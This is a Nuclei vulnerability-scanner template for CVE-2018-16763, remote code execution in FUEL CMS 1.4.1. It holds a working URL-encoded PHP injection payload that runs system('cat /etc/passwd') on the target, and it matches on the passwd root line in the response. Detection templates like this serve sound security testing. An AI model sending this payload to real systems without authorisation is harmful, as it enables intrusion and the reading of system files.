nuclei-templates/cves/CVE-2018-16763.yaml

27 lines
720 B
YAML

id: cve-2018-16763
info:
name: fuelCMS 1.4.1 - Remote Code Execution
author: pikpikcu
severity: critical
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Refrence: https://www.exploit-db.com/exploits/47138
requests:
- raw:
- |
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"